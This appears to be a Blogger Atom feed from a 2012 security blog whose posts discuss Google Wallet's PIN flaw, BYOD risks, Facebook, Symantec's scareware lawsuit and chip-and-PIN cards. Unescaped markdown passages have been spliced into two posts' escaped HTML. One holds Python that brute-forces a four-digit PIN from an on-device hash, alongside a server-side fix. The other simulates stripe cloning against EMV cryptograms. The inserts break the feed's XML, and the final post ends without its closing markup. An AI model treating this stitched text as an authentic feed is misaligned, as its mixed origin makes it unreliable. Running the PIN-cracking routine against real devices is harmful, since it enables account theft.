<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3489213761668248259</id><updated>2012-02-19T18:25:23.321-08:00</updated><title type='text'>Paranoid Security</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>25</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-7861960781454341264</id><published>2012-02-19T18:22:00.000-08:00</published><updated>2012-02-19T18:25:23.334-08:00</updated><title type='text'>Wallet Woes...</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="http://1.bp.blogspot.com/-6BWEN76KrA8/T0GuMcKvsAI/AAAAAAAAAGM/lStrFrydUlY/s1600/swiss-knife.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-6BWEN76KrA8/T0GuMcKvsAI/AAAAAAAAAGM/lStrFrydUlY/s1600/swiss-knife.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;Someone please help Google; their new payment service is a disaster. Personally I think the &lt;a href="http://www.youtube.com/watch?v=DsaJMhcLm_A" target="_blank"&gt;entire concept&lt;/a&gt; is crap. People have more than enough payment options; do we really need yet another one? Also, cell phones have become something of a digital Swiss Army knife; I'm not convinced that adding a credit card is a great idea. With all the personal information people already carry around on their phones, adding a way for them to get robbed as well doesn't sound appealing.&lt;br /&gt;&lt;br /&gt;Google claims that people are protected using this service because its app requires a PIN to approve transactions. However, earlier this month a &lt;a href="http://www.theregister.co.uk/2012/02/10/google_wallet_again/" target="_blank"&gt;flaw was revealed&lt;/a&gt; that makes it possible to &lt;a href="http://www.theverge.com/2012/2/8/2786015/google-wallet-pin-cracked-on-rooted-android-devices" target="_blank"&gt;crack the PIN&lt;/a&gt; if the phone has been rooted. While this may not seem like a big deal, it's important to recognize that as many as &lt;a href="http://topics.dallasnews.com/quote/052b4VN1wTbQq" target="_blank"&gt;one in five&lt;/a&gt; phones are estimated to be rooted, and many manufacturers now even provide instructions on how to root their devices. Google has even gone so far as to &lt;a href="http://www.wired.com/gadgetlab/2011/05/android-movie-rental/" target="_blank"&gt;ban certain capabilities&lt;/a&gt; from rooted phones. 
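The post does not say how the PIN was recovered. The Python below is added here as an illustration and is not taken from the post or from Google; it shows the general failure mode behind any "PIN checked on the handset" design: if the verifier for a four-digit PIN is stored on the device, whoever can read it (root access gives exactly that) can brute-force all 10,000 candidates offline in a fraction of a second. The salt, the SHA-256(salt || pin) layout and the ServerPinVerifier class are constructed for the example; the latter assumes the fix of verifying the PIN and counting failures somewhere the handset's owner cannot read.

```python
import hashlib
import hmac
import os

# Constructed example, not Google's code or storage format: the handset
# keeps SHA-256(salt || pin) so it can check the PIN locally. The salt
# below is made up for the illustration.
PIN_LENGTH = 4
SALT = bytes.fromhex("0b7c4a9e2d1f6a33")


def store_pin(pin, salt=SALT):
    """The on-device verifier; a rooted phone lets its owner read it."""
    return hashlib.sha256(salt + pin.encode()).digest()


def crack_pin(verifier, salt=SALT, length=PIN_LENGTH):
    """Offline brute force. With salt and hash in hand there are only
    10**length candidates, so this finishes in well under a second."""
    for candidate in range(10 ** length):
        pin = str(candidate).zfill(length)
        guess = hashlib.sha256(salt + pin.encode()).digest()
        if hmac.compare_digest(guess, verifier):
            return pin
    return None


class ServerPinVerifier:
    """The fix: keep the verification key off the handset and count
    failures, so the only attack left is online guessing at whatever
    rate the server allows."""

    def __init__(self, pin, max_attempts=5):
        self._key = os.urandom(32)              # never leaves the server
        self._tag = hmac.new(self._key, pin.encode(), hashlib.sha256).digest()
        self.max_attempts = max_attempts
        self.failures = 0

    def locked(self):
        # Locked once the failure count has reached max_attempts.
        return self.failures not in range(self.max_attempts)

    def check(self, pin):
        if self.locked():
            return False
        tag = hmac.new(self._key, pin.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(tag, self._tag):
            return True
        self.failures += 1
        return False
```

The salt does not help here: it only defeats precomputed tables, and an attacker who can read the verifier can read the salt next to it. The keyspace is the problem, and the only way to protect a four-digit secret is to make every guess cost an online round trip that a counter can shut off.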
&lt;br /&gt;&lt;br /&gt;In an attempt to save face, Google &lt;a href="http://www.washingtonpost.com/business/technology/google-wallet-security-bug-fixed/2012/02/15/gIQAtxxBGR_story.html" target="_blank"&gt;scrambled to fix&lt;/a&gt; the flaws in its wallet app as quickly as they emerged, but I'm wondering whether people will ever really use it. Everyone carries around a wallet with at least one or two debit or credit cards inside. You need ID in order to drive your car, so it's not like we'll suddenly stop taking our physical wallets with us. Until people start taking their credit cards out of their wallets (not likely) I can't really see smartphone payment systems ever taking off. It will take years before &lt;a href="http://www.theregister.co.uk/2012/02/19/google_apple_wallet_advertising/" target="_blank"&gt;all the kinks&lt;/a&gt; are worked out, and by then I'm not sure people will ever really trust them. I give it another 6 to 12 months before phones as payment devices fizzle out.&amp;nbsp; We need &lt;a href="http://en.wikipedia.org/wiki/Chip_and_PIN" target="_blank"&gt;more secure&lt;/a&gt; payment options!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-7861960781454341264?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/7861960781454341264/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2012/02/wallet-woes.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/7861960781454341264'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/7861960781454341264'/><link rel='alternate' type='text/html' 
href='http://paranoid-security.blogspot.com/2012/02/wallet-woes.html' title='Wallet Woes...'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-6BWEN76KrA8/T0GuMcKvsAI/AAAAAAAAAGM/lStrFrydUlY/s72-c/swiss-knife.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-1978085473477980637</id><published>2012-01-24T17:49:00.000-08:00</published><updated>2012-02-01T18:12:15.719-08:00</updated><title type='text'>BYOD: Bring Your Own Device</title><content type='html'>&lt;div&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-7-aYaq2QGCY/Tx9e5q2NS6I/AAAAAAAAAF0/ZuJtsEzJfew/s1600/android+hacker.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-7-aYaq2QGCY/Tx9e5q2NS6I/AAAAAAAAAF0/ZuJtsEzJfew/s200/android+hacker.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&amp;nbsp;&lt;a href="http://4.bp.blogspot.com/-Jdhwy5P9cQs/Tx9e71XpBQI/AAAAAAAAAF8/YfYyS4JlWXQ/s1600/iphone_pirate_2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/-Jdhwy5P9cQs/Tx9e71XpBQI/AAAAAAAAAF8/YfYyS4JlWXQ/s200/iphone_pirate_2.jpg" width="162" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;So far in 2012 the term BYOD has been all the buzz. 
It seems like everywhere you look there's someone rambling on and on about the 'threat' organizations are facing as a result of the '&lt;a href="http://www.google.com/search?q=byod" target="_blank"&gt;Bring Your Own Device&lt;/a&gt;' revolution. The interesting part, however, is that people have been trained for so many years to be scared of viruses and trojans that they're missing the real danger.&lt;br /&gt;&lt;br /&gt;Yes, malware is and always will be a problem, but have we yet seen a single piece of malware that can jump from a smartphone to other devices on the network? Maybe, but not that I'm aware of. Most smartphones and tablets today are based on the ARM architecture, meaning that native code written to infect a smartphone &lt;a href="http://www.brighthub.com/computing/hardware/articles/107133.aspx" target="_blank"&gt;will not run&lt;/a&gt; on an x86-based PC. Now, that's not to say that a mobile virus or worm couldn't upload an x86 build of itself to another system; again, it'll probably happen at some point, but I haven't seen it yet.&lt;br /&gt;&lt;br /&gt;But what about the 800-pound gorilla in the room that everyone seems to miss? Smartphones &amp;amp; tablets are nothing but small computers. Yes, at an architectural level they run a bit differently, but they are fully capable of doing everything that a laptop can do. Think about it: &lt;a href="http://www.notebookreview.com/default.asp?newsID=2022" target="_blank"&gt;old laptops&lt;/a&gt; had less than a gig of RAM and a single-core processor but were basically doing the exact same things we use more powerful machines for today. Today's smartphones &amp;amp; tablets are more powerful than some of those old laptops, so why would you think for a minute that a competent attacker couldn't use that platform to launch an attack?&lt;br /&gt;&lt;br /&gt;No one suspects that you'll be hacking into their network when you attach to their WiFi using your smartphone or tablet, and that's exactly the problem. 
For months I've known that tools like &lt;a href="http://www.backtrack-linux.org/downloads/" target="_blank"&gt;BackTrack5 &lt;/a&gt;and &lt;a href="http://blog.androidclone.com/?page_id=5" target="_blank"&gt;Laika &lt;/a&gt;were developed specifically to run on ARM-compatible processors. Then today I saw &lt;a href="http://www.zimperium.com/anti.html" target="_blank"&gt;this&lt;/a&gt;: an app developed specifically for penetration testing from a mobile platform. Finally, point &amp;amp; click hacking has arrived on the smartphone.&amp;nbsp;My prediction is that this often-overlooked point of entry will eventually get exploited BIG TIME, at which point people will suddenly wake up and take notice. But at that point it'll be too late. The proverbial cat will be out of the bag and everyone else will be chasing their tails for another year trying to figure out how to plug the holes.&amp;nbsp;Good times ahead, boys &amp;amp; girls.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-yZ8lINgtdZA/Tx9fURJkgXI/AAAAAAAAAGE/fOb6MWYf9co/s1600/hackers-ahead.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-yZ8lINgtdZA/Tx9fURJkgXI/AAAAAAAAAGE/fOb6MWYf9co/s400/hackers-ahead.jpg" width="371" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-1978085473477980637?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/1978085473477980637/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2012/01/byod-bring-your-own-demise.html#comment-form' title='0 Comments'/><link rel='edit' 
type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1978085473477980637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1978085473477980637'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2012/01/byod-bring-your-own-demise.html' title='BYOD: Bring Your Own Device'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-7-aYaq2QGCY/Tx9e5q2NS6I/AAAAAAAAAF0/ZuJtsEzJfew/s72-c/android+hacker.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-2302476895180515499</id><published>2012-01-18T10:26:00.000-08:00</published><updated>2012-01-18T10:26:01.838-08:00</updated><title type='text'>Reasons not to use Facebook...</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-cJScCFbXN0o/TxcOYewmcLI/AAAAAAAAAFU/8elH_zAxXoE/s1600/ban_facebook.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-cJScCFbXN0o/TxcOYewmcLI/AAAAAAAAAFU/8elH_zAxXoE/s200/ban_facebook.png" width="197" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Last week Facebook was hit by yet another attack; this time &lt;a href="http://www.pcworld.com/businesscenter/article/247370/45000_facebook_accounts_compromised_what_to_know.html" target="_blank"&gt;45,000 accounts&lt;/a&gt; were compromised. 
The new worm was actually a mutation of two separate attacks merged into one. As with most social media malware, common sense is the main line of defense. Don't click on links from people you don't know. Don't open attachments that are posted on your wall.&lt;br /&gt;&lt;br /&gt;Here are my top three reasons why you should avoid using Facebook.&lt;br /&gt;&lt;br /&gt;First, of course, would be the &lt;a href="http://www.informationweek.com/news/security/vulnerabilities/231903502" target="_blank"&gt;threats and vulnerabilities&lt;/a&gt;. Facebook has a ridiculous number of users, making it a prime target for any attacker. Every couple of months there's a new outbreak plaguing users. With so many people on the site there are tons of unsophisticated users who do not know any better and will break common-sense rules about what is and isn't good practice. There's a damn good chance that you're connected to a couple of these people, which in turn puts you at risk. Facebook does deserve credit for initiating a &lt;a href="http://www.facebook.com/whitehat/bounty/" target="_blank"&gt;bug bounty program&lt;/a&gt;; however, in my opinion their bounties are far too low to be enticing.&lt;br /&gt;&lt;br /&gt;Second is &lt;a href="http://www.forbes.com/sites/chunkamui/2011/08/08/facebooks-privacy-issues-are-even-deeper-than-we-knew/" target="_blank"&gt;privacy&lt;/a&gt;: do people you haven't talked to in years really need to know personal information about your daily life? Obviously not. Privacy has been a major issue for Facebook and one of their main sources of pain. 
Unlike other companies, Facebook's attitude towards its members is&lt;a href="http://abcnews.go.com/Technology/facebook-privacy-mississippi-woman-sues-facebook-tracked-online/story?id=14754964#.TxcNAm9SRpU" target="_blank"&gt; not always the most ethical &lt;/a&gt;and has on occasion &lt;a href="http://www.theverge.com/2011/11/29/2596708/facebook-ftc-settlement-privacy-lawsuit" target="_blank"&gt;landed them in hot water&lt;/a&gt;. &amp;nbsp;As if that weren't enough, it's a major source of info for bad guys everywhere. I understand the nature of 'social' networking, but there's also this thing called 'social' engineering. Guess what? Facebook is a one-stop shop for a lot of these types of reconnaissance operations.&lt;br /&gt;&lt;br /&gt;The third and final reason is time. Facebook is a time suck and completely drains people's productivity. Let's say that a person spends an average of 20 minutes per day on Facebook (with smartphones and people using it from the office I'm sure we can agree that this is an extremely conservative estimate). So 20 minutes x 365 days in a year &amp;nbsp;= 7,300 minutes / 1,440 minutes in a day = 5.07 days per year. 
That's right ladies and gents, just 20 minutes per day adds up to over 5 entire days of your year wasted on Facebook gathering useless information about people that likely don't really matter.&lt;br /&gt;&lt;br /&gt;I remember a world before Facebook and I miss it...&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-TVQGiw85810/TxcOcqZL5MI/AAAAAAAAAFc/UcymVHggFAQ/s1600/antifacebook.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-TVQGiw85810/TxcOcqZL5MI/AAAAAAAAAFc/UcymVHggFAQ/s320/antifacebook.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-2302476895180515499?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/2302476895180515499/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2012/01/reasons-not-to-use-facebook.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/2302476895180515499'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/2302476895180515499'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2012/01/reasons-not-to-use-facebook.html' title='Reasons not to use Facebook...'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-cJScCFbXN0o/TxcOYewmcLI/AAAAAAAAAFU/8elH_zAxXoE/s72-c/ban_facebook.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-4848062222402157275</id><published>2012-01-12T11:37:00.000-08:00</published><updated>2012-01-12T11:37:52.335-08:00</updated><title type='text'>Shame on Symantec</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Hub1ZGo8DOM/Tw82Zg9z_NI/AAAAAAAAAFM/YuNoacWgsD4/s1600/SCAM.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-Hub1ZGo8DOM/Tw82Zg9z_NI/AAAAAAAAAFM/YuNoacWgsD4/s1600/SCAM.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Corporations never cease to amaze me... Just when I think I've heard it all, a new scam pops up. Although this time it's not so much the scam as the culprit that surprised me. Everyone knows (or at least should know) that there are tons of &lt;a href="http://en.wikipedia.org/wiki/Rogue_security_software" target="_blank"&gt;fake anti-virus&lt;/a&gt; applications trolling the internet. These programs are highly unethical and prey on the elderly and uninformed. Over the holiday break a family friend called me complaining that he could not use his laptop because an antivirus program was demanding his credit card... My friend is over 70 years old and knows just enough about computers to be dangerous (literally). 
The application had basically locked him out of his own computer, claiming that it was infected and should not be used (irony?).&lt;br /&gt;&lt;br /&gt;Luckily he hadn't provided them with his information and instead brought me the computer to&lt;a href="http://www.bleepingcomputer.com/virus-removal/remove-xp-antivirus-2012" target="_blank"&gt; remove the rogue app&lt;/a&gt; (Windows AntiVirus 2012). Now, I'd heard of these applications before, but this was my first time seeing one live. Removing the application was not terribly difficult but was definitely not something my friend would have been able to do himself. &amp;nbsp;After removing it I did a bit of forensic analysis to figure out how he'd gotten the infection. It turns out he hadn't updated his Flash player and had downloaded an exploit; this was used to install a trojan, which then called home to download and install the rogue software.&lt;br /&gt;&lt;br /&gt;Obviously the practice of installing unsolicited software is illegal and unethical. However, apparently the concept of tricking consumers into thinking their clean system is infected is something of a grey area. Symantec, one of the world's largest and most trusted security firms, has apparently &lt;a href="http://www.reuters.com/article/2012/01/10/us-symantec-lawsuit-idUSTRE8092G320120110" target="_blank"&gt;decided to use similar trickery&lt;/a&gt;&amp;nbsp;to swindle people out of their hard-earned money. This is unbelievable. How could a company as large as Symantec stoop so low? Thankfully a lawsuit (currently seeking class-action status) has been filed against Symantec, bringing the issue to light. 
&amp;nbsp;According to &lt;a href="http://www.scribd.com/doc/77960090/grossvssymantec" target="_blank"&gt;the lawsuit&lt;/a&gt;, the software tells consumers about problems that don't really exist in an attempt to sell the full version, which will 'fix' the problems.&lt;br /&gt;&lt;br /&gt;Hopefully this is a lesson learned for all vendors that these types of sales practices will not be tolerated.&amp;nbsp;Shame on you, Symantec; I hope the courts make an example out of you.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-KUG8Y84DdW4/Tw82KAjUU4I/AAAAAAAAAFE/_QPoET3oMX8/s1600/symantec.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="220" src="http://2.bp.blogspot.com/-KUG8Y84DdW4/Tw82KAjUU4I/AAAAAAAAAFE/_QPoET3oMX8/s400/symantec.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-4848062222402157275?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/4848062222402157275/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2012/01/shame-on-symantec.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/4848062222402157275'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/4848062222402157275'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2012/01/shame-on-symantec.html' title='Shame on Symantec'/><author><name>Daniel Ayoub, 
CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-Hub1ZGo8DOM/Tw82Zg9z_NI/AAAAAAAAAFM/YuNoacWgsD4/s72-c/SCAM.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-1733855958956819904</id><published>2011-12-31T21:22:00.000-08:00</published><updated>2011-12-31T21:22:13.745-08:00</updated><title type='text'>Give Credit</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-wgfrj6eOS74/Tv_r2rHiDmI/AAAAAAAAAEk/JPhbq53E6XE/s1600/psn-credit-card-hack1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-wgfrj6eOS74/Tv_r2rHiDmI/AAAAAAAAAEk/JPhbq53E6XE/s1600/psn-credit-card-hack1.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Everyone knows that credit and ATM cards are &lt;a href="http://abcnews.go.com/US/luckys-supermarket-chain-hit-card-skimmer-thieves/story?id=15123679" target="_blank"&gt;insecure&lt;/a&gt;, yet for some reason, credit card companies in the USA are very reluctant to switch over from the traditional 'swipe and sign' cards most Americans carry in their wallets every day. 
The question is why; after all, isn't a more secure system that limits fraud in everyone's best interest?&amp;nbsp;More secure technology has existed for several years around the world and initially debuted in the US almost &lt;a href="http://www.computerworld.com/s/article/9176936/Smart_credit_cards_arrive_in_U.S._finally" target="_blank"&gt;two years ago&lt;/a&gt;. In fact, we've been &lt;a href="http://travel.usatoday.com/deals/inside/story/2011/04/Travel-friendly-chip-and-pin-credit-cards-coming-to-US/46327546/1" target="_blank"&gt;hearing for months&lt;/a&gt; now that this technology is coming, yet the&amp;nbsp;&lt;a href="https://www.pcisecuritystandards.org/" target="_blank"&gt;payment card industry&lt;/a&gt;&amp;nbsp;has been slow to roll it out in the USA because of the cost of replacing cards and terminals.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;For the past several years throughout Europe a type of credit card known as '&lt;a href="http://en.wikipedia.org/wiki/Chip_and_PIN" target="_blank"&gt;chip and PIN&lt;/a&gt;' (the EMV standard) has been adopted as the de facto standard.&amp;nbsp;These cards carry an embedded &lt;a href="http://en.wikipedia.org/wiki/Smart_card" target="_blank"&gt;smart-card chip&lt;/a&gt; alongside the magnetic stripe. The stripe holds static, unencrypted account data that any skimmer can read and copy onto a blank card; the chip holds a cryptographic key that is never read out. When making a purchase, the buyer enters a PIN at the point-of-sale terminal rather than signing a receipt. The PIN (four digits on most cards; EMV permits four to twelve) is the cardholder authentication mechanism. Authorization is still performed online against the issuing bank, but the account data comes from the chip, which also computes a one-time cryptogram over the transaction details (amount, a transaction counter, a random number from the terminal) using its key. The issuer recomputes that cryptogram before approving the purchase, so data captured from one chip transaction cannot be replayed or altered to make another, which is what makes the chip harder to defraud than the stripe. 
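To make the stripe-versus-chip difference concrete, here is a Python sketch added here as an illustration; it is not from the post, from any card scheme or from EMV itself. It is deliberately simplified: real EMV cards derive 3DES or AES session keys from a card master key and the transaction counter and compute the cryptogram as a MAC over EMV-defined fields. The per-card key from os.urandom, the "pan|amount|atc|un" field layout and the HMAC-SHA256 stand-in truncated to eight bytes are all constructed for this example. What carries over is the structure: the stripe gives a reader everything the card has, while the chip only ever gives a reader a cryptogram bound to this transaction's counter and nonce.

```python
import hashlib
import hmac
import os

# Added illustration, not real EMV. Constructed pieces: the card key from
# os.urandom, the "pan|amount|atc|un" layout, and HMAC-SHA256 truncated
# to 8 bytes standing in for the EMV application cryptogram.


class MagStripeCard:
    """A magnetic stripe holds static account data and nothing else, so
    whatever a reader (or a skimmer) sees is the whole card."""

    def __init__(self, track2):
        self.track2 = track2

    def swipe(self):
        return self.track2


def stripe_clone_is_indistinguishable():
    genuine = MagStripeCard("4111111111111111=1412")   # constructed track-2-like data
    skimmed = genuine.swipe()            # captured by a skimmer at the terminal
    clone = MagStripeCard(skimmed)       # written onto a blank card
    return clone.swipe() == genuine.swipe()


class ChipCard:
    """The chip keeps a key the terminal never reads; it only returns a
    cryptogram over this transaction's details."""

    def __init__(self, pan, card_key):
        self.pan = pan
        self._key = card_key
        self.atc = 0   # application transaction counter

    def generate_ac(self, amount_cents, unpredictable_number):
        self.atc += 1
        data = f"{self.pan}|{amount_cents}|{self.atc}|{unpredictable_number.hex()}".encode()
        arqc = hmac.new(self._key, data, hashlib.sha256).digest()[:8]
        return {"pan": self.pan, "amount": amount_cents, "atc": self.atc,
                "un": unpredictable_number, "arqc": arqc}


class Issuer:
    """Online authorization: recompute the cryptogram with the card's key
    and insist that the transaction counter moves forward."""

    def __init__(self):
        self.keys = {}
        self.last_atc = {}

    def issue_chip_card(self, pan):
        key = os.urandom(16)
        self.keys[pan] = key
        self.last_atc[pan] = 0
        return ChipCard(pan, key)

    def authorize(self, req):
        key = self.keys.get(req["pan"])
        if key is None:
            return False
        # Replay check: an ATC at or below the last one seen is a replay.
        if req["atc"] in range(self.last_atc[req["pan"]] + 1):
            return False
        data = f"{req['pan']}|{req['amount']}|{req['atc']}|{req['un'].hex()}".encode()
        expected = hmac.new(key, data, hashlib.sha256).digest()[:8]
        if not hmac.compare_digest(expected, req["arqc"]):
            return False
        self.last_atc[req["pan"]] = req["atc"]
        return True


def demo():
    """Returns (genuine accepted, replay accepted, tampered accepted)."""
    issuer = Issuer()
    card = issuer.issue_chip_card("4111111111111111")
    req = card.generate_ac(2599, os.urandom(4))      # terminal supplies the nonce
    genuine = issuer.authorize(req)
    replay = issuer.authorize(req)                    # skimmer replays the same record
    # Skimmer bumps the counter and lowers the amount; without the key the
    # cryptogram no longer matches.
    tampered = issuer.authorize(dict(req, atc=req["atc"] + 1, amount=1))
    return genuine, replay, tampered
```

The PIN is not in this sketch on purpose: it authenticates the cardholder to the card, but it is the cryptogram and the counter that stop a captured transaction from being reused. A chip card that still carries a stripe, as most do, remains exposed at any terminal that falls back to swiping it.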
